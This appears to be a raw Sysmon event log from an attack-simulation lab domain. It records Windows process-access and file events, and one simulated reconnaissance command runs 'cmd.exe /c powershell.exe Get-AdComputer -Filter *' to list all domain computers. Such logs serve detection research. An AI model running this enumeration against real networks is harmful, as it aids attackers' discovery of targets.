18:16:59.881{B81B27B7-4012-611D-0B00-00000000C801}6365724C:\Windows\system32\lsass.exe{B81B27B7-4F9B-613A-7290-03000000C801}3876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 17141700x800000000000000035085796Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-CreatePipe2021-09-09 18:16:59.865{B81B27B7-4F9B-613A-7290-03000000C801}3876\PSHost.132756850197105595.3876.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000035085795Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.849{B81B27B7-4F9B-613A-7290-03000000C801}3876ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_g531ucal.yj3.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085794Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:59.849{B81B27B7-4F9B-613A-7290-03000000C801}3876ATTACKRANGE\REED_SCHMIDTC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_wkuhoeku.qlm.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 11241100x800000000000000035085793Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.834{B81B27B7-4F9B-613A-7290-03000000C801}3876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\reed_schmidt\AppData\Local\Temp\2\__PSScriptPolicyTest_wkuhoeku.qlm.ps12021-09-09 18:16:59.834 10341000x800000000000000035085792Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.736{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4F9B-613A-7290-03000000C801}3876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085791Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:59.712{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-4F9B-613A-7290-03000000C801}3876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085790Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.697{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085789Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:59.697{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085788Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.697{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085787Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:59.697{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085786Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.697{B81B27B7-4130-611D-9D00-00000000C801}31603808C:\Windows\system32\csrss.exe{B81B27B7-4F9B-613A-7290-03000000C801}3876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085785Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:59.697{B81B27B7-4F9B-613A-7190-03000000C801}5704532C:\Windows\system32\cmd.exe{B81B27B7-4F9B-613A-7290-03000000C801}3876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035085784Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.710{B81B27B7-4F9B-613A-7290-03000000C801}3876C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe Get-AdComputer -Filter *C:\Users\reed_schmidt\ATTACKRANGE\REED_SCHMIDT{B81B27B7-4132-611D-4F05-090000000000}0x9054f2MediumMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{B81B27B7-4F9B-613A-7190-03000000C801}5704C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c powershell.exe Get-AdComputer -Filter * 10341000x800000000000000035085783Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.697{B81B27B7-9957-6127-D045-01000000C801}53121524C:\Windows\system32\conhost.exe{B81B27B7-4F9B-613A-7190-03000000C801}5704C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
10341000x800000000000000035085782Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.697{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085781Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.697{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085780Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:59.697{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085779Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.697{B81B27B7-4012-611D-0C00-00000000C801}7326824C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085778Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:16:59.697{B81B27B7-4130-611D-9D00-00000000C801}31603808C:\Windows\system32\csrss.exe{B81B27B7-4F9B-613A-7190-03000000C801}5704C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035085777Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:16:59.697{B81B27B7-4822-613A-788F-03000000C801}69404828C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{B81B27B7-4F9B-613A-7190-03000000C801}5704C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\92b818b675d92827ce6f9fe02da8f648\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5b28184(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b47d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f9b0b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c5a73546(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4f5802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\e47f5b06b63cd9ac2f165abd13a9b5b7\System.Management.Automation.ni.dll+c4fbb
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39D500CE41E4EAF033E776D361611270,SHA256=D1F5FED9C4215C57BC0C53B6D682C1CFA38F608ACC0092BE0D5E427F371CB4A0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085864Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:17.653{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9298BD87252056296BBC8D193F3477A0,SHA256=388B29350A8908F3BC990C9C13110445B9C0B244F353D8107C6476E241556D82,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085865Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:18.673{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3EB2C5BF7645B7F7A2C64175D17BBAC7,SHA256=2DF5855B8142C894B25EE78B0F61642E50CD9DC0DD45F77690094B15726D6682,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035085898Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.869{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D01A2D9FC9B0049B50F5A5C7D28064F0,SHA256=6FEF26304C411DEB0572E20259A898D735235C87E8F45AB2FE300A905B2BC39F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
23542300x800000000000000035085897Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.237{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D7F5B679520EF29CC85D26115BD0ABB1,SHA256=2AD89D6B83F61FACA7AB486466DC553D3A251DDDF3D6802EF3581DD269E23381,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035085896Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085895Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085894Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-1F2E-6131-9C70-02000000C801}6620C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085893Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085892Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085891Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085890Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:17:19.137{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4133-611D-AB00-00000000C801}4564C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035085889Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
